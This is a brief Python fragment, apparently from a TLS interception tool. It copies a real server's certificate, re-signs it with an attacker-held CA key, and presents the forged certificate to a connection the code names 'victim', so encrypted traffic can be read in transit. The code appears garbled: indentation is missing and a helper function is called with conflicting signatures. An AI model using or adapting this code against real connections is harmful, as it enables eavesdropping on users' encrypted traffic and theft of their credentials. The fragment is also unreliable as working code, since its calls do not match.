def dupe_socket_cert(soc, ca):
cert_der = soc.getpeercert(True)
cert_pem_buggy = ssl.DER_cert_to_PEM_cert(cert_der)
cert_pem = cert_pem_buggy.replace("-----END CERTIFICATE-----",
"\n-----END CERTIFICATE-----")
cert = crypto.load_certificate(crypto.FILETYPE_PEM, cert_pem)
new = dupecert.dupe(cert)
dupecert.sign(ca, new)
return new
def _start_mitm(self):
if self._started:
return
server = SSL.Connection(self._mk_ctx(),
self.server_plain)
server.set_connect_state()
server.do_handshake()
fake_cert_pkey = dupecert.dupe(self.ca_cert, self.ca_key,
server.get_peer_certificate())
victim = SSL.Connection(self._mk_ctx(cert_pkey=fake_cert_pkey),
self.victim_plain)
victim.set_accept_state()
victim.do_handshake()
self.server = server
self.victim = victim
self._started = True
